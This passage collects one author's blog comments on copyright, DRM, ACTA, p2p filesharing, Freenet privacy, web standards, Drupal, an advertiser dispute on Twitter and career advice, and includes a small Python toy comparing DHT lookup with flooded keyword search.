be supported by laws. Also fair use laws need to be protected against DRM restrictions. These restrictions are forced on people by using the monopoly granted by copyright law, and they keep people from exercising their fair use rights, granted by the same copyright laws.

  • on "culture industry": A culture industry isn't useful for society by definition. It is only useful, if it helps getting more and more enjoyable cultural works to everyone (or at least the vast majority of citizens - including those who earn only very little money). Only in that case is it warranted to give it any additional legal support.

  • on "market as regulator": Using the "market" to regulate the behavior of the middlemen with the power of the consumers doesn't work, because copyrighted works are monopolies by law and the market only works without monopolies. Creative works can't directly compete against each other, because people have no way of getting an equivalent alternative since every creative work is unique.

  • on forcing people to pay: Today almost no one is forced to pay for any digital goods, because almost everything is available for unpaid download somehow (sometimes illegally). That people still pay for the creative works they enjoy shows clearly that most people want to pay authors for the goods they enjoy. That's something which is deeply ingrained in our psyche: If someone gives us something, we want to give something back. Due to these two effects, it's quite clear that building bigger and bigger restrictions into legally bought content only harms the people who want to give the authors money. It would be far more useful to establish a system which enables people to securely and effortlessly give a few Euro to someone else - or even just a few cents. A "one click donation" which every EU citizen could use could give authors of creative works far more support than any "harmonization of restriction management systems".

  • on me: I am a stakeholder, as I am at the same time a music and book customer, a hobby free software programmer and a hobby writer who publishes under free licenses (on http://draketo.de and http://1w6.org ). I learned about the music genre I enjoy the most (Filk) when I downloaded some tracks in a filesharing network many years ago and I now own more CDs of that genre than of any other genre - and every year I add three or four CDs to my collection. If there had been any effective fair-use-prevention-measure in place back then, I still wouldn't know my favorite kind of music and I still wouldn't buy more than one CD every two years or so.

"Person caught who stole IDs via Gnutella" - ridiculous p2p bashing

Comment to LimeWire ID theft case.

That means that people who spread child porn were caught because they used public p2p networks (where law enforcement can find them), and instead of thanking LimeWire that they were able to catch a criminal because he was lured into the open (instead of selling the material invisibly via the postal service), politicians blame LimeWire for the existence of the material, which had existed in the dark long before Gnutella made sharing easy and public.

These people don't become criminals because of LimeWire.

But they get caught because they use it and don't realize that everyone can find what they share and track them down - including the cops.

As soon as the crime is bad enough that the cops inquire at a court to get the data of the criminal internet user, that user can easily be tracked down. It's far less effort than stopping someone from sending illegal material via the postal service.

So LimeWire and public p2p help the cops.

That ID theft case is even weaker. It is as if we'd ban cars because some people forget to lock them - or ban wallets because some people lose them (including their ID). The main difference is that you have to actively disable security to lose your ID via LimeWire while your wallet just slips out.

Somehow I smell other motivations than stopping crimes here...

A downside of networking and public reputation: No communication for the sake of communication (alone)

-> A comment on The Importance of Managing Your Online Reputation.

I read your article, and I found the points you make very interesting, though not only in a positive way.

You tackle the “we have a network others can see” from the active side: “How can I make sure my employer likes what he sees?”.

But there's also the other side: We use the web for communicating with people, and this communication is being pulled into the open, and everything we do online is being instrumentalized to extract information about us.

This also means that no communication over a public channel can be done for the sake of the communication itself, and so the channel becomes more and more useless for any creative communication (as opposed to just exchanging preconceived and unchanging ideas).

This might sound hard, but it stems from two concepts:

  • When we want to act creatively, we are most efficient, when we do it for the sake of the activity itself. -> http://www.gnu.org/philosophy/motivation.html

  • When people know that they are being watched, they act differently (sadly I have no link on this).

Another issue is an adaptation of the “unclear prophecy” problem: If people know that their online activity is being measured, they will change their behaviour to please their intended future employer, and so a measurement doesn't give you estimations about the person which are relevant to the job. Instead it only measures one parameter: “How good are you at conscious social network building?”

And for many jobs that skill is almost irrelevant.

So using public communication for calculating a score of some kind runs into a paradox as soon as people know that they are screened, and it harms normal communication. Due to that I hope that more and more people will realize that unscreenable but efficient communication is important.

For example a network similar to identi.ca / twitter could be built on jabber with decentral buddy-lists, which can't easily be read out as massively as twitter, and the really paranoid could completely switch over to freenet as their news communication provider: http://freenetproject.org

ACTA - A trend to be reversed

A reply to a comment on slashdot named Can we fight the trend?:

There was a trend to having only proprietary software (by former free software being enslaved in the job contracts its creators took) and to having the hacker community die out.

That trend was reversed by GNU with the invention of the GPL and the GNU System.

And today millions of people use free software and we have organizations like the EFF and FSF who work for a free software society.

- That huge success story in about 4 minutes: infinite-hands.draketo.de

More people than ever before use free software, and it becomes an integral part of our society as more and more government offices (e.g. in Germany: Munich) and companies adopt it.

Today we have a trend towards having only nonfree culture (by the laws being turned upside down and politicians being bought) and towards members of the free speech community giving up.

What I learn from history is:

That trend can be reversed, too, and our society might become a free culture society, just like it slowly becomes a free software society, even though most people will only realize it in hindsight.

"Do you still remember the times, when every office had Windows in it?"

"Only barely, but do you still remember the times, when we feared lawsuits when we accessed the predecessors of the culture pool?"

"Sure! Those were the times. Now, let's get writing again. Don't want to let our fans wait for the next storyarch, do we?"

The ones who profit from unfree media will put up a fight this time, though.

And that they choose to go semi-criminal shows that, unlike the proprietary software vendors back when GNU was invented, the unfree media companies are already losing, and they know it.

ACTA horror - what can we do?

a comment to: Embattled ACTA Negotiations Next Week In Geneva; US Sees Signing This Year:

I didn't yet manage to get really reliable information on what ACTA actually does (that's a marker for 'this is dangerous' in itself), but what I see on wikileaks sounds horrible:

"The deal would create a international regulator that could turn border guards and other public security personnel into copyright police. The security officials would be charged with checking laptops, iPods and even cellular phones for content that "infringes" on copyright laws, such as ripped CDs and movies."
- http://wikileaks.org/wiki/ACTA_trade_agreement_negotiation_lacks_transpa...

'Check my laptop's content'???

What about my electronic diary, then?

Without a clear judge's order, no one is allowed to look at my private files, and should they remove that restriction, they might as well remove all privacy.

And it gets worse:
"The guards would also be responsible for determining what is infringing content and what is not."

and worse:

"Mr. Fewer and Mr. Geist said, once Canada signs the new trade agreement it will be next to impossible to back out of it.
In a situation similar to what happened in the Softwood Lumber trade dispute, Canadians could face hefty penalties if it does not comply with ACTA after the agreement has been completed."

Ouch!
That doesn't sound like a treaty between nations, but more like some big players conspiring to create law which binds all others, and that clearly is antidemocratic.

So a big question looms: What can we do against ACTA?

What can we do?

Ways to act I found:

Advertisers threatened me on twitter for ridiculing their misleading ad


Today advertisers answered a tweet that linked to a story about the possibility of stealing fingerprints remotely from Android phones with a blatant advertisement for their “superior” “proprietary” technology. When I ridiculed their advertisement, they threatened me. Let’s call them colortext and their brand #slowblood.12

I was annoyed at the ad, but I decided to answer with a smile:

2016: Hackers can now steal the #slowblood scanning biometric data from Android phones.

They answered

(Tech) cannot be compromised or recreated unlike fingerprints.

And that’s quite a claim, so it just called for a counter:

2017: CCC hackers log into Merkelphone with a 30€ bioprint of remotely copied #slowblood data.3

and added

you get snide remarks for your blatant self-advertisement of proprietary tech.

…and for “can’t be compromised” ← that is a HUGE claim.

to which they first answered with a twinkle

…-letting people know there’s a superior alternative ;)

but after I replied

or was this an offer to send the hackers your security system so they can test it?

…(in that case I would take back my criticism)

they went on to threaten me:

You are tweeting lies and using our trademark without consent.

I felt a sudden pang of fear. Still I answered

[…] are you threatening me for using the same hashtag as you?

2018: #slowblood developers at colortext realize that 2016 and 2017 were in the future back in 2015

But despite the irony in the text my heart was thumping hard. That threat is a serious one. I reported it to twitter:

report

A few minutes later their tweets were gone — but I had expected that and taken screenshots. I’m writing about it, because I consider their actions unacceptable behavior - and because my heartbeat isn’t completely back to normal yet. Their harassment works, so they have to be called out for it.

Note: Different from the rest of my page, this image is not GPL licensed, because it contains text from them as proof of their actions. Their individual lines do not constitute a creative effort, but the combined text might reach the threshold of intentional creative [inappropriate word omitted].

conversation

In the notification view, which includes a few additional tweets (dear twitter, this is a bug!):

conversation


  1. I will not name them here because they later threatened me with a trademark violation. The name is in the pictures because I’m pretty sure that if they use their brand as hashtag, the hashtag is fair game on twitter. In this text I’ll instead use the names colortext for the company and #slowblood for the tech. 

  2. I don’t have anything against their tech. It might be brilliant and provide security for years to come, or it might just be another fad. Their way of advertising it as the solution to all security problems is what irks me. It’s still a marker which is tied to your body, so you cannot change it in case it is copied. As such, its security properties are questionable: If it is copied once, you as a person cannot use the method again until there are new sensors which cannot be fooled by copies of data from the old sensors. For its security properties you have to rely on constant improvements in the sensors -- but this offers no advantage over copied fingerprints from the Android phone. The only advantage I can see is that you can’t steal these prints in real-life resolution by handing someone a glass of water. You might now think that they actually had a point, but sadly that security property is completely irrelevant to the article to which the advertisers replied, because the article showed that fingerprints were copied in the resolution measured by the sensor. There would be no advantage at all from switching from fingerprint to #slowblood, so what they did is just bad advertising -- and sending out threats when they were called out for their bad style. 

  3. They did not spot the implication in here that the german chancellor would use their tech in 2017. I intentionally gave them that lead to turn this around in a fun way but they seem to have missed it. 

Attachment (size):
2015-08-06-chromasecurity-threatens-arnebab-for-irony-01-cropped-nogpl.png (258.26 KB)
2015-08-06-chromasecurity-threatens-arnebab-for-irony-02-cropped-nogpl.png (329.15 KB)
2015-08-06-chromasecurity-threatens-arnebab-for-irony-03.png (13.35 KB)
2015-08-06-chromasecurity-threatens-arnebab-for-irony-04.png (1.87 KB)
2015-08-06-chromasecurity-threatens-arnebab-for-irony-05.png (7.89 KB)
2015-08-06-chromasecurity-threatens-arnebab-for-irony-06.png (15.23 KB)

Amarok - context on music - yahoo comes a tiny bit too late

There was a talk by Ian Rogers from Yahoo! in which he explained how the labels made a hell of a lot of horrible missteps in fighting p2p and in trying to push DRM, how Yahoo now offers a free music service, and how music software terribly lags behind the music scene. http://www.netribution.co.uk/2/content/view/1317/182/

But....

The context he talks about already exists. Just have a look at Amarok:

- Context: http://amarok.kde.org/d/en/index.php?q=gallery&g2_itemId=1375
- Wikipedia: http://amarok.kde.org/d/en/index.php?q=gallery&g2_itemId=1381
- Lyrics sites: http://amarok.kde.org/d/en/index.php?q=gallery&g2_itemId=1378
- and an integrated store where you don't have to buy to listen:

And all that in a free software program, so no one dictates any rules upon you.

I don't know about you, but I definitely get excited by it!

Ambition the Film: This is where magic happens

I just watched the short film Ambition from ESA, and I still have tears in my eyes.

The film is awesome. In a few spots it could have profited from tighter editing of the text (I lost suspension of disbelief twice), but overall the story is great - and what an ending!

In the making-of, the simulation artist of the film, Lukasz Sobisz, said

“shooting myself in the foot a bit, I’m very surprised you need something like this at all now. Mankind sends a probe into space to catch a comet and land on it. And we need a great director, film and actors to convince people this is interesting.”

and I disagree with that notion: If you’re paid by the public, you should communicate your work so people can relate to it. The film succeeded spectacularly.

It is not just about interest. I had that before. It is about touching people's hearts. A dry description alone cannot do this. But together, an idealistic project and art can reach something deep inside, inaccessible to everyday interaction. This is where magic happens.

I wish there were a German-dubbed version to show my kids.

It’s been a long time since I watched something and all of a sudden felt tears rolling down my cheek. To the folks at ESA, the film crew, the editing team and the artists: Thank you.

PS: The EuGH (the European Court of Justice) just ruled that embedding does not affect copyright. Thanks to this decision I am allowed to share the film with you.

Anonymous against trapwire - on camera??

An answer to a reddit-comment by tedemang to the article 1540 Anonymous vs. TrapWire: "We must, at all costs, shut this system down and render it useless".

Do you think joining Anonymous really helps there? That’s fleeting power, but I don’t see alternative structures being set up. This just exposes all those who want to support the cause. In front of cameras, connected to a surveillance system which records every action…

On the short term to keep secure digital communication, use freenet over your existing internet connection. If possible in darknet-mode, connecting only to your friends → freesocial.draketo.de

On the mid-term get a flourishing local community in your neighborhood, ideally with community operated internet like a meshnet - and get someone from your community elected as mayor → /r/darknetplan

And make sure you all have access to alternative media sources. Maybe provide printed copies of good blog posts to your local baker.

On the somewhat longer term, fix the democratic system, so the rich cannot completely rig the votes by deciding to whom they give their money so that person can run for election.

On the long term, fix the economic system, so we don’t automatically get that huge imbalance in power, once the system runs without major disruption for more than 20-30 years.


Remember that what you are going up against is the very instrument the oppressive elements of our state want to use to oppress us. That instrument will monitor you, and they will try to use that data to oppress you - and to cast you in a bad light, so they can convince your neighbors that they need more cameras against those vandalizing youths (without telling them that those youths are the same ones who come over for coffee during the next summer-festival).

Australia gets mandatory data retention

Australia gets mandatory data retention — with unchecked access by roughly any local or federal police agency and “Any other agency the Attorney General publicly declares”. (So much for separation of powers)

And they can use that in court.

→ » Australia: Now is the time to go dark « ←

Dear Australians: This is what we have been talking about the past 10 years. The tech for confidential communication might still be cumbersome to use, but you now need it.

If you want to use Freenet for that, I’ll gladly help you set it up. Find me and other volunteers in the Freenet support chat.

→ » Freenet support chat « ←

If you don’t get an answer right away, just keep the browser window open: we will see your question when we read our backlogs. If you’re still in the channel when we enter, we can answer you.

Defective by Design is doing something important - actions like theirs got me to GNU/Linux

-> A reply to bashing against Defective By Design.

I was a rabid MacUser 5 years ago.

Then I learned about DRM, TPM and privacy. And I left Apple because they put TPM chips into developer machines.

Today I'm a happy GNU/Linux user and I contribute from time to time to Gentoo, KDE and Mercurial.

(my way from Apple to GNU/Linux:
- http://bah.draketo.de/ (Broken Apple Heart in German)
- http://draketo.de/english/songs/light/broken-apple-heart (in English) )

So DBD isn't only talking to the converted. Without actions like theirs, I wouldn't be a free software user today.

They just don't reach every average Joe with a single campaign. But who could? With a few hundred people?

What they can achieve is that once an average Joe gets into problems with DRM, there's a chance that he won't think “surely I made a mistake. I'll just buy the stuff again” but “weren't there people who said that Apple tries to take my freedom? Seems they were right. I won't fall for DRM again!”

And they can reach critical thinking people, who realize they should also think about their freedom when they buy a new device.

Don't completely rely on something you don't control (SaaS)

in reply to You do know you can't rely on Gmail, right?

You're citing some of the reasons why I dislike SaaS, but there's one more:

Whenever I use a SaaS application, I trust someone whom I really can't reach, and I trust him without being able to exert any kind of control.

He wants to use my data for marketing purposes? No problem - I won't ever find out, since I can't check the physical disk's last-accessed flag. So what about that being illegal? If I can't find out about it, why should he care? I won't ever be able to sue him.

Sure, most people are nice and law-abiding, but I prefer not to rely on everyone being honest who has access to my data on some remote server.

Sure, I can use encryption for the data I upload, but any data generated on the server will be open for the admin - regardless of the security scheme on the server, because the admin could just fake that.

So it's always back to trusting people, and I prefer not to trust others too far (nor too little).

So your company keeps its company secrets in gmail accounts? How long will it take for Google to find it, if they chance to become a competitor in the field?

If you use gmail without GnuPG encryption, you can just as well give your data directly to Google.

And the same holds true for every other SaaS solution. You can't ever trust the remote server.

It also holds true for all unfree software, by the way. You can't look inside it (or get someone else to do that), so you can't know what it does. Do you really dare to trust it?

EME in standards would mount enormous pressure on all free systems

→ comment to On EME in HTML5 by Tim Berners-Lee, taking a social angle to the problems of DRM via EME in web standards.

Dear Tim,

The previous commenters already addressed every technical comment I wanted to add. There is only one aspect I still feel missing here:

If you give EME your blessing, the social pressure on all free software communities to add proprietary blobs in their shipped browsers will rise enormously, because otherwise the proprietary developers will accuse them of not following the standard.

With that weapon in their box, I could even see copyright cartels taking to legal tools to force free software distributions to include their proprietary blobs — because following standards is seen as so important in Europe that programs can be excluded from government tenders when they do not follow specified standards. And while EME does not specify any CDM as part of the standard, that is very easy to hide in the argumentation.

Yes, that would be irony: the ones who always fought against standards suddenly using their interpretation of the standard to expunge programs which do not follow their interests.

But is it actually implausible?

Consider the pressure Microsoft put on the city of Munich to kill off the LiMux project. How much easier would this have been, if some CDMs didn’t and couldn’t run on the free system?

Please stick to the vision of the web and keep EME out of the standard. I can decide not to use an app, and every user can clearly recognize the app as not-the-web. With EME users will instead say that Linux is broken, because it does not play their internet videos. And when confronted with non-playing videos, the site owners will say "your browser does not follow the standard". That argument is in a different league than the current "we bought a non-standard third-party tool which does not support your setup".


in reality the utopian world of people voluntarily paying full price for content does not work — Tim Berners-Lee

This started to work for music once big platforms started to provide DRM-free music which was easy to pay for.

Instead of EME, the web needs a standardized way to pay for content conveniently. Then most people will pay — as they already do for music — because it’s much easier to simply buy the work, and they have much more important things to do with their time than searching for a gratis copy which doesn’t actually give them anything extra. The only use of DRM in HTML is forcing inconvenience on all law-abiding users.

Instead of binding that much energy in a battle about preserving or destroying the freedom of the web, I’d wish the W3C would focus its efforts on a standardized, convenient way to pay.

PS: Also see the Response to Tim Berners-Lee's defeatist post about DRM in Web standards by defective by design.

How Drupal will save the world - Simplicity for beginners, complexity for experts - get in quick

Written in reply to: How Drupal will save the world.

I experienced the same with modules (having to search for hours), and I think I know at least two ways to make Drupal more accessible to newcomers.
A bit of background: I just set up my third Drupal page and I find new modules even now. The pages were of three slightly different but very similar types:

  • A newssite, needed mostly taxonomy.
  • A personal site, needed book and taxonomy, as well as themes.
  • A site for a free roleplaying system. Mostly needed book.

But even though the pages were quite different, I find myself reusing most modules.

And it took me hours to hunt them down.

To make the modules more accessible to newcomers, they should be more organized.

One way to organize them would be to give them an additional sorting by the type of page I want to use them for (usecase). A blog, for example, needs different modules than a newssite. But there will be much overlap.

Then users could simply check "I want a blog. Which modules do I need?"
Still they'd have far too many to choose from, and the choice needs to be simplified for first-time users. To do that, users should be able to sort modules by popularity.

Ways to sort by popularity:

  • Download-count: The number of times they were downloaded during the last month or six months.
  • Vote: Allow users to vote for modules and show the votes.

The second way to make Drupal more accessible would be to create rich compilations. That means: Don't just offer a "general drupal, search your modules by hand" download, but also some specialized precompiled versions, best with adapted config already included.

Some ideas for downloads:

  • Drupal Community Bookwriting
  • Drupal Community Newssite
  • Drupal Personal Webpresence
  • Drupal Blog
  • Drupal Webshop
  • Drupal Wiki
  • Drupal Forum
  • Drupal Rich Community Site (Forums, Community Book, Blogs, Webshop, Wiki - the full package)

These should then be the downloads a visitor first sees, to make the Drupal site a site for users.

Examples:

  • Drupal Community Bookwriting: http://1w6.org - mine, german. If you like it, I'll gladly send you the details of the setup. http://1w6.org/contact .
  • Drupal Community Newssite, if not perfect: http://gute-neuigkeiten.de - my first drupal installation.
  • Drupal Personal Webpresence: http://draketo.de - my second Drupal installation, misses photo albums (since I don't yet need them) and similar to be a full-fledged personal web presence.

- All parts of the design on these sites are licensed under free licenses (one of them being the GPL). -

These two ideas still give experts the full power of Drupal, but enable newcomers to get a site running quickly.

If you like the idea, please feel free to contact me: http://1w6.org/contact

Howard-Taylor: A rising figure

A comment to The newspaper said it, so it must be true:

You already made the "I get paid for doing a free webcomic" rise; now the next part is... ?

Some ideas:

  • Being paid really well
  • Having Sandra be paid really well, too
  • Having a Schlock foundation which pays you for the online comic directly
  • Getting a six figures income from Schlock
  • Having the Schlock foundation grow enough that it becomes the Taylor Webcomic fund which pays webcomic authors all over the world
  • Founding a team of Space Mercenaries and writing the comic about your actual adventures as Schlock sidekick
  • Really having someone do the research so the Schlockers can beat NASA to Mars
  • Learning the trick to living long enough to go on inking where no one has inked before
  • Founding the Schlock colony fund which pays people to leave earth, meet interesting life forms and take over their planets :)
  • Finally taking a strange scientist on board who starts the biggest intergalactic war by revolutionizing galactic transportation.
  • And at last, building a time machine and going back in time to be a webcartoonist again :)

I hope French Filesharers turn to Freenet

→ Comment to France Starts Reporting ‘Millions’ of File-Sharers by Torrent Freak.

I hope they all turn to freenet. There’s scant chance of getting many user addresses there, and it can provide a service similar to torrents and a decentralized tracker in one, but anonymously and safe from censorship.

http://freenetproject.org

I’ve been running it for years now, and it got better and more secure every year.

The really paranoid can use it in darknet-mode: Only connect to people they know personally. Then it gets really hard to find out that you use freenet.

But even in Opennet, it’s extremely hard to find out what you share or download. Freenet is built for the needs of dissidents in repressive regimes and to avoid any kind of censorship, so it delivers sufficient privacy and anonymity for filesharers.

A word of warning, though: Compared to well-seeded torrents, freenet is slow. That’s the price of anonymity and privacy. But nowadays it’s fast enough for fansubbed anime and beats many weakly seeded torrents :)

Maybe then the media companies will learn that the way to make money with entertainment is to make it good and personal enough that people want to give them money to make sure they keep producing more great stuff. They could learn from Howard Taylor and Schlock Mercenary.

If you do what you love doing, it becomes what you are good at

comment to You’re Not Meant To Do What You Love. You’re Meant To Do What You’re Good At. by Brianna Wiest, who argues that the skills of people are "a blueprint of their destiny". For support she describes experiences with people who try to do something they do not actually enjoy doing.

This whole argument sits on the assumption that skills develop somehow on their own.

Skills develop, because you use them. So if you do what you love doing (note the nuance!), then — except in rare cases — this becomes what you are good at.

And the real joy from daily work is in how it fulfils the values we hold. What we value differs between people. For some it is money, for some it is respect and for some it is following the paths they chose themselves.

In addition we live in a society where fewer and fewer people are needed for the tasks which actually have to be done — Food. Shelter. Health. Education. — because productivity rises by 2% every year. That means it is doubling roughly every 35 years (1.02^35 ≈ 2), so with every generation we need 50% fewer people for the tasks which have to be done. But new tasks are found which help society, and if many people pursue their passions, it is more likely that some people already have the required training when a given skill turns out to be very helpful to society.

The article takes a mistake — people trying to do something they want to have done but which they don’t actually love to do — and then uses it as the basis for an argument that people should only do what they are good at. Which is not related to the problem described. It uses flawed reasoning to argue for something very problematic.

A society in which all people have to do only what they are good at is one without personal choice. It is an inhumane dystopia.

Consider the endgame: Your skills are measured at the age of 5. Then you get to learn what you are good at. And later do that.

And yes, with all-encompassing, constant and retroactive external evaluation of every choice in life we are moving there. It’s why people are so obsessed with their CVs these days, while 30 years ago many more followed their passions, regardless of what society thought.

You cannot expect to earn money with something you are not good at. But as a society we need to give people the space to experiment with things they are not yet good at to make it more likely that there are people who have the skills needed for the niches which open tomorrow. Otherwise we will have to pay far more people for doing something they are not good at, because no one will ever have developed the necessary skills.

The only skill you can be good at without doing what you love is a skill which someone else chose for you.

You can train to become really, really good in almost anything you decide to do.

Should you do what you’re good at, or rather do what you love? Should you use your talents or follow your passion?

To answer this question, let’s look at actual research instead of gut feeling.1 Is a talent how good you are at doing something? Then it is a function of training time. Is it how fast you move forward? Then you likely already learned from other tasks many of the things you need for your task at hand.

If you’re not competing in top sports or pitting your skills against others every day in objectively measurable competitions where the winner takes it all (so you would have to be the best to earn anything), you can learn to be really good at almost everything, if you put your mind to it. But you have to put your mind to it and train. Research showed that even the level of skill that top athletes and musicians possess is a direct function of the amount of training they put in (on a logarithmic scale: double the training to become better by one measurable unit).

That’s why I consider telling people to follow their talents instead of their passion to be cynical, though disguised as trying to help people find happiness. To paraphrase: “You are born with fixed talents. Your only choice in life is to use these or to be unhappy.” This isn’t just patronizing and invalidates the very idea of free will. It is also wrong.

The more realistic (and positive) guideline is to do what you love doing, and to work towards becoming great in what you love doing. Which is not the same as doing what you would love to have done: the hero is not the one who loves standing on the tribune but the one who loves doing what’s right despite hindrances. Training is hard, but if you make it a habit, it can become natural:

»The shift from deliberate to natural is powerful and transformational.«
— Thomas Oppong in To Get More Creative, Become Less Judgemental

You can learn to become really, really good in almost anything you decide to do. It’s unlikely that you’ll become world champion if you start into a new skill at the age of 40, but you can come pretty close to the champions with a tenth of the training they put in. If you always did what (others said) you were good at till the age of 40, you still have a choice: When you reach 50 you can be very good at something you chose, or world class at something others chose for you.

But keep in mind that you’ll still need something to eat. If what you love doing cannot keep you and your family fed, then you will have to settle for something less — for example using what you’re already good at in such a way that you love doing it and finding joy in some aspects of what you do. Those who told you what to do might have had good reason for that (but then, they might still have been wrong).

(also see The 4 things it takes to be an expert or the book Thinking, Fast and Slow by Kahneman)


  1. The Role of Deliberate Practice in the Acquisition of Expert Performance, K. Anders Ericsson, Ralf Th. Krampe, and Clemens Tesch-Römer, Psychological Review, 1993 

KDE and Gnome vs...

I'm a KDE user and quite excited about KDE 4, but I think the progress of Gnome is very promising, too.

Gnome and KDE both innovate, and both push limits, and both will learn from each other.

KDE learns from Gnome and uses the Telepathy definition.

Gnome learns from KDE and switches to WebKit, which originates from KHTML.

Both work together under the hood of freedesktop.org

And both are moving ever faster to replace proprietary systems.

So hey, I might be a KDE user and I might care most about KDE, but Gnome and KDE are both important, because being two projects they can move in different ways, find together again and move out again and that way cover far more ground than a single project could.

I want many people to use KDE and Gnome users want many people to use Gnome.

Let's move out, then, and create guides for our users and create many great things which bring them to the respective desktop, and while we try to create a better experience than the other free desktops, we might suddenly see that we just surpassed any non-free desktop together.

Then we can sit down, celebrate a big free software party and begin outpacing the respective other one again.

And while doing so, we can still keep contact, share ideas and work together, and we will make a difference.
- written at: http://blogs.gnome.org/desrt/2007/08/07/im-excited-about-the-future-of-g...

Killing the head of a terrorist organization doesn’t stop it

→ A comment to The Effectiveness of Political Assassinations.

Another answer why this doesn’t work is really simple: Consider that you were in a terrorist organization. You work with people in secrecy, but the ones you know are close to you, because they know your most intimate secrets.

In short: you fight alongside friends (though probably assholes by most ethical standards).

Now someone kills one of your friends.

He is shown around in the media and people say how evil he was.

Now imagine not wanting revenge. Quite hard, isn’t it? A religious or power-play argument just got personal.

If it helps, imagine that the one who got killed was your father, sister or beloved one.

If it’s still hard to imagine why killing a leader is counterproductive, try to imagine that someone raped and killed your 14-year-old daughter. Then he got celebrated in the media as a hero. Would you manage not to start a personal war against him, but to calmly go to a lawyer and accept hearing that your daughter incited him to his acts by dressing like a whore?

If this sounds unrelated: It’s the same emotional reaction, just pulled into our own cultural context. Terrorists believe that they fight for a just cause (at least if they aren’t only in it for the money). So any killing just strengthens their will to fight all out.

The only reason why killing a leader could stop the group is that the leader may be the only one whom everyone inside the group knows and who can coordinate it. But naturally he has lieutenants who also know everyone, and if one of those dies, he gets replaced.

So please fight terrorism in a way which works: make sure that terrorists have no support in the general population. That naturally means that you must not be openly hostile to that population.

Ask first “Why do they hate us?”, and then try to change that.

Last.fm royalties, question about free music

Written at: http://musicmanager.last.fm/contact/

Hi,

I licensed all my works under free and open licenses which permit any kind of commercial copying and reuse, but which don't permit taking away rights from the listeners.

I'd like to upload the files to last.fm, but I can only do so if I can be sure that no additional restrictions will be placed on the users (no DRM). Otherwise I would violate the license agreement.

These are the terms under which I work together with other artists, so there's no way around that.

I can upload the files, but I need to know that all users will retain the following rights to my files:

  • Free use for any purpose (however they retrieve it; paying to get it is OK)
  • Free modification
  • Free passing on or selling while giving other users the same rights.
  • Free passing on or selling of modified works while giving other users the same rights.

Are these rights safe with you?

Best wishes,
Arne


Answer: no.

LimeWire Interview - badmouthing their own technology

Comment to the LimeWire-Interview on Slyck.

Their words, my comments (from three years of reading and discussing on the Gnutella Development Forum (GDF)):

"Gnutella has had a 2 GB file size limit, while BitTorrent excels at delivering truly enormous files."

-> That's just blabber, but it now explains why LW wasn't that quick in closing the 2GB limit, even though the way to do it has been around for more than two years (and was posted to the Gnutella Development Forum where Gnutella developers discuss).

There is no underlying technological hurdle for sharing files with a size of more than 2GB, except for the one which LimeWire doesn't want to fix so that they can use it as an excuse to include BitTorrent.

Also, Gnutella already does completely decentralized swarming, and has done so for more than two years.

The only real advantage of BitTorrent is that it has torrent sites where users meet and comment, but you can do the same for Gnutella (for example like http://freebase.be ).

And that the other p2p-clients don't have it.

"A Gnutella program connects to peers randomly, and broadcasts searches into its neighborhood. It can't find a file outside this neighborhood. Enter the Mojito DHT, a revolutionary new technology we've developed for LimeWire. In a distributed hash table like Mojito, the peers don't connect randomly--they organize themselves into a navigable tree. Imagine one computer has the only copy of a rare file, and another on the far side of the network wants it. With Mojito, they'll be able to find each other."

-> Except that this neighborhood is about 400,000 computers, and there have been plans for years to extend it to 1 million while reducing network traffic.

The only thing which hindered that is that LimeWire didn't manage to get their program to keep 100 connections without too much impact on performance.

And with the performance of Gnutella (traffic of only 7 kB/s up and down for a fully connected ultrapeer, less than 1 kB/s for a leaf), increasing the network size wouldn't have created many problems.

-> A bit deeper: http://draketo.de/english/p2p/light/why-gnutella-scales-quite-well - if you like it, please digg it...

Still, Mojito will be a great complement to Gnutella, because it can be used to search for files and hosts _by hash_. If you want _exactly that file_, then you use Mojito (a Kademlia implementation) and a hash string. If you want to search by keyword or tag, then you use Gnutella.
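
To see the difference in a nutshell, here is a tiny toy sketch, not LimeWire's Mojito code: the peer names, the file and the network layout are invented; the point is only the contrast between locating the responsible node by XOR distance and flooding neighbors with a TTL-limited keyword search.

    import hashlib

    def sha1_int(data: str) -> int:
        return int(hashlib.sha1(data.encode()).hexdigest(), 16)

    class Node:
        def __init__(self, name):
            self.id = sha1_int(name)     # node ID in the same space as file hashes
            self.files = {}              # hash -> filename
            self.neighbors = []

    # A small invented "network" of 50 peers, each knowing three neighbors.
    nodes = [Node(f"peer-{i}") for i in range(50)]
    for i, n in enumerate(nodes):
        n.neighbors = [nodes[(i + k) % len(nodes)] for k in (1, 2, 3)]

    rare_file = "rare-recording.ogg"
    file_hash = sha1_int(rare_file)
    # Kademlia-style: the file reference lives on the node whose ID is
    # closest (by XOR distance) to the file's hash.
    min(nodes, key=lambda n: n.id ^ file_hash).files[file_hash] = rare_file

    def dht_lookup(h):
        # A real DHT routes towards the closest ID hop by hop; the toy
        # simply computes the closest node directly.
        return min(nodes, key=lambda n: n.id ^ h)

    def keyword_flood(start, keyword, ttl=3):
        # Gnutella-style: ask your neighbors, who ask theirs, limited by a TTL.
        seen, frontier, hits = {start}, [start], []
        for _ in range(ttl):
            nxt = [m for n in frontier for m in n.neighbors if m not in seen]
            frontier = list(dict.fromkeys(nxt))   # dedupe while keeping order
            seen.update(frontier)
            hits += [f for n in frontier for f in n.files.values() if keyword in f]
        return hits

    print(dht_lookup(file_hash).files[file_hash])   # always finds the single copy
    print(keyword_flood(nodes[0], "rare"))          # empty unless a copy is within the TTL horizon

The hash lookup reaches the one copy no matter where it sits, while the keyword search only sees what lies within its horizon; that is why hash lookup and keyword search complement each other.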

And it will help LimeWire, because other Gnutella clients won't have it at once, so they will be in front. Gnutella is an open protocol, so they need to look at all times like they are front row, else some other Gnutella client will take over their users.

I don't know why they badmouth their own technology, but as you've seen, I have some suspicions.

On Forums and trolls

written in the Phex Forum.

"Let them walk against a hill of politeness, and then let them slide off. Have a ban-request as forcepunch somewhere near, if they try to break the hill despite explicitely having been warned."

I try to avoid giving them a chance to justify growing angry. If they shout despite having no justification, and if they don't stop after being asked to disable their caps lock (always assume the best), I try to just warn them that they'll be banned if they go on (I never had to - and there was just one case where I decided to ignore a provocation instead - see our Polar Skulk forum) and just request a ban if they don't stop.

Every post in any forum in here (not just Phex) will be read by other people, and if the tone of the posts grows too angry, angry people and trolls will flock here, because they see that provocation makes someone angry in here.

And I know that trolls come anyway, but a hill of calmness seems to me like the best way to reduce the number of those who actually post.

And my mood is much better, when I read my own calm posts than when I read a post where I let my temper flare up.
- Arne Babenhauserheide

One Guide to rule them all,
One Guide to find them,
One Guide to reach them all
and into calmness bind them.

On keeping emotions in check

